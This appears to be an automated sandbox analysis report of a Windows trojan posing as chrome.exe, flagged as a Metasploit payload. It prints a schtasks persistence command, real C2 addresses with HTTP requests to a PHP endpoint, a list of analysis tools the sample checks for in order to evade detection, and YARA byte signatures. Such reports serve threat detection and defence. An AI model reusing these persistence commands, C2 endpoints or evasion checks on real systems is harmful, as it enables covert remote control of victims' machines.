
Windows Analysis Report
chrome.exe

Overview

General Information

Sample Name: chrome.exe
Analysis ID: 1270926
MD5: b2eaf44f5d0ea664e504c9c8c6c42d23
SHA1: c79f1dccf4aa3a973f9a5ad54e6f0d9497066971
SHA256: 8897994e897bb1b2d22188d332ea972eff725b3b02b9dab0e5b5e73ab60d79c4
Tags: exe

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • chrome.exe (PID: 5780 cmdline: C:\Users\user\Desktop\chrome.exe MD5: B2EAF44F5D0EA664E504C9C8C6C42D23)
    • schtasks.exe (PID: 5700 cmdline: "schtasks.exe" /query /TN WinTask MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 1844 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • s1szwqo5.shl.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe" MD5: 468F9575A65D99F52FA2B52C505F59A6)
  • chrome.exe (PID: 5612 cmdline: C:\Users\user\Desktop\chrome.exe MD5: B2EAF44F5D0EA664E504C9C8C6C42D23)
    • schtasks.exe (PID: 7192 cmdline: "schtasks.exe" /query /TN WinTask MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Type": "Metasploit Connect", "IP": "104.248.194.233", "Port": 443}
Yara matches, dropped files (Source | Rule | Description | Author | Strings)
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | JoeSecurity_MetasploitPayload_2 | Yara detected Metasploit Payload | Joe Security
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | Windows_Trojan_Metasploit_91bc5d7d | unknown | unknown
    • 0x18d7:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5

Yara matches, memory dumps (Source | Rule | Description | Author | Strings)
  • 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
  • 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  • 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp | Windows_Trojan_Metasploit_91bc5d7d | unknown | unknown
    • 0xd7:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5
  • 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
  • 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0x329:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  (table truncated; 7 entries in total)

Yara matches, unpacked PEs (Source | Rule | Description | Author | Strings)
  • 0.2.chrome.exe.2715754b520.1.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
  • 0.2.chrome.exe.2715754b520.1.unpack | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0xac9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  • 0.2.chrome.exe.2715754b520.1.unpack | Windows_Trojan_Metasploit_91bc5d7d | unknown | unknown
    • 0xb1f:$a: 49 BE 77 73 32 5F 33 32 00 00 41 56 49 89 E6 48 81 EC A0 01 00 00 49 89 E5
  • 10.0.s1szwqo5.shl.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
  • 10.0.s1szwqo5.shl.exe.140000000.0.unpack | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
    • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  (table truncated; 8 entries in total)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "104.248.194.233", "Port": 443}
Source: chrome.exe | ReversingLabs: Detection: 63%
Source: chrome.exe | Virustotal: Detection: 64%
Source: chrome.exe | Avira: detected
Source: http://128.199.113.162 | Avira URL Cloud: Label: malware
Source: http://128.199.113.162/upwawsfrg.php?zd=1 | Avira URL Cloud: Label: malware
Source: http://128.199.113.162/upwawsfrg.php | Avira URL Cloud: Label: malware
Source: http://128.199.113.162 | Virustotal: Detection: 12%
Source: http://128.199.113.162/upwawsfrg.php | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen7
Source: chrome.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | Joe Sandbox ML: detected
Source: chrome.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 33MB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 128.199.113.162 (31 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 104.248.194.233 (2 occurrences)
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://128.199.113.162
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027156FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://128.199.113.162/upwawsfrg.php
Source: chrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027156F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://128.199.113.162/upwawsfrg.php?zd=1
Source: chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://128.199.113.162x
Source: chrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://128.199H
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unknown | HTTP traffic detected:
  POST /upwawsfrg.php HTTP/1.1
  Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
  Host: 128.199.113.162
  Content-Length: 126665
  Expect: 100-continue
  Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe | Code function: 10_2_00000001400040D6 LoadLibraryA,WSAStartup,WSASocketA,connect,recv, 10_2_00000001400040D6
Source: global traffic | HTTP traffic detected:
  GET /upwawsfrg.php?zd=1 HTTP/1.1
  Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
  User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
  Host: 128.199.113.162

System Summary

Matched rule: Windows_Trojan_Metasploit_c9773203 (Author: unknown; description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.; os = windows, severity = x86, creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23), matched in:
  • 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPE
  • 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
  • 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
  • 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPE
  • 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPED

Matched rule: Windows_Trojan_Metasploit_91bc5d7d (Author: unknown; reference_sample = 0dd993ff3917dc56ef02324375165f0d66506c5a9b9548eda57c58e041030987, os = windows, severity = x86, creation_date = 2021-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 8848a3de66a25dd98278761a7953f31b7995e48621dec258f3d92bd91a4a3aa3, id = 91bc5d7d-31e3-4c02-82b3-a685194981f3, last_modified = 2021-10-04), matched in:
  • 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPE
  • 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
  • 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
  • 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPE
  • 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPED

Source: chrome.exe | Static PE information: No import functions for PE file found
Source: chrome.exe | Binary or memory string: OriginalFilename vs chrome.exe
Source: chrome.exe, 00000000.00000002.563185616.000002715546C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs chrome.exe
Source: chrome.exe | Binary or memory string: OriginalFilename vs chrome.exe
Source: chrome.exe, 00000006.00000002.584356100.000001F0744A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs chrome.exe
Source: chrome.exe | ReversingLabs: Detection: 63%
Source: chrome.exe | Virustotal: Detection: 64%
Source: chrome.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\chrome.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\chrome.exe C:\Users\user\Desktop\chrome.exe
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\chrome.exe C:\Users\user\Desktop\chrome.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chrome.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\chrome.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome.exe.log
Source: C:\Users\user\Desktop\chrome.exe | File created: C:\Users\user\AppData\Local\Temp\rf2vtycg.4mn
Source: classification engine | Classification label: mal100.troj.evad.winEXE@16/4@0/2
Source: C:\Users\user\Desktop\chrome.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: chrome.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: chrome.exe, Type_8.csBase64 encoded string: 'pGK3kkOcyYdGAAPi/8G6N1XJe1C6K1NE48AddJAp9UpqE9ETf3AYgdAt7XPV9u0z'
              Source: chrome.exe, Type_7.csBase64 encoded string: 'gH+tHsKNvsbZ1EWhvkP3EI/4krTieZANT0IAF7dhi4rYvHth2WCRnUgs3pnZNNdzV+fF2DM4tXqFk8/R+sF11/V8uT2G+0Jglr9qFD7nWN3TcH2IdXXT5szSY8lpN/c5ERsM6YxPhnZV3qDkhjRx7r+lRv0Gd4haNDkFJkOp6Pg='
              Source: chrome.exe, Type_6.csBase64 encoded string: 'SFUUwksm21Jo5J+5xTj7msRAcfAo4qs7FQBZp/dECCssEyp3hstrrTA/CRzvoiV5'
              Source: chrome.exe, Type_1.csBase64 encoded string: '+q2Xl7nHs88OaG9hRih/Yn2TZXu+RlD9XOtERiaZ6keIAJhZrzZDwvY3CHI9ippP'
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01
              Source: chrome.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: chrome.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: chrome.exeStatic file information: File size 1142288 > 1048576
              Source: chrome.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: chrome.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x113e00
              Source: chrome.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

Source: chrome.exe, Type_8.cs | .Net Code: Method_30 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: chrome.exe, Type_8.cs | .Net Code: Method_30
Source: C:\Users\user\Desktop\chrome.exe | Code function: 0_2_00000271552D645E push rbp; iretd 0_2_00000271552D646E
Source: C:\Users\user\Desktop\chrome.exe | Code function: 0_2_00000271552D490B push FFFFFFF3h; iretd 0_2_00000271552D490D
Source: C:\Users\user\Desktop\chrome.exe | Code function: 0_2_00000271552D4308 push rdi; retn 00FFh 0_2_00000271552D431C
Source: C:\Users\user\Desktop\chrome.exe | Code function: 0_2_00000271552D3E28 push rdi; ret 0_2_00000271552D3E29
Source: C:\Users\user\Desktop\chrome.exe | Code function: 6_2_000001F074243E28 push rdi; ret 6_2_000001F074243E29
Source: C:\Users\user\Desktop\chrome.exe | Code function: 6_2_000001F074244308 push rdi; retn 00FFh 6_2_000001F07424431C
Source: C:\Users\user\Desktop\chrome.exe | Code function: 6_2_000001F07424490B push FFFFFFF3h; iretd 6_2_000001F07424490D
Source: C:\Users\user\Desktop\chrome.exe | Code function: 6_2_000001F07424645E push rbp; iretd 6_2_000001F07424646E
Source: s1szwqo5.shl.exe.0.dr | Static PE information: section name: .ftrs
Source: initial sample | Static PE information: section where entry point is pointing to: .ftrs
Source: s1szwqo5.shl.exe.0.dr | Static PE information: real checksum: 0xfb8c should be: 0xfd44
Source: chrome.exe | Static PE information: real checksum: 0x0 should be: 0x11959b
Source: initial sample | Static PE information: section name: .text entropy: 7.939923426280949
Source: C:\Users\user\Desktop\chrome.exe | File created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe

              Boot Survival

Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Users\user\Desktop\chrome.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OLLYDBG.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: REGMON.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AUTORUNS.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PETOOLS.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IDAQ.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: DUMPCAP.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: FILEMON.EXE
Source: C:\Users\user\Desktop\chrome.exe TID: 3516 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\chrome.exe TID: 5848 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\chrome.exe TID: 7264 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\chrome.exe TID: 7068 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\chrome.exe | Thread delayed: delay time: 922337203685477
Source: chrome.exe, 00000006.00000002.584356100.000001F07450D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: s1szwqo5.shl.exe, 0000000A.00000002.811372775.000000000054B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: chrome.exe, 00000000.00000002.564760019.000002716F8B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvtm
Source: C:\Users\user\Desktop\chrome.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\chrome.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe"
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Source: C:\Users\user\Desktop\chrome.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
Source: C:\Users\user\Desktop\chrome.exe | Queries volume information: C:\Users\user\Desktop\chrome.exe VolumeInformation
Source: C:\Users\user\Desktop\chrome.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tcpview.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: lordpe.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autoruns.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ollydbg.exe
Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: regmon.exe

              Remote Access Functionality

Source: Yara match | File source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPED
Source: Yara match | File source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
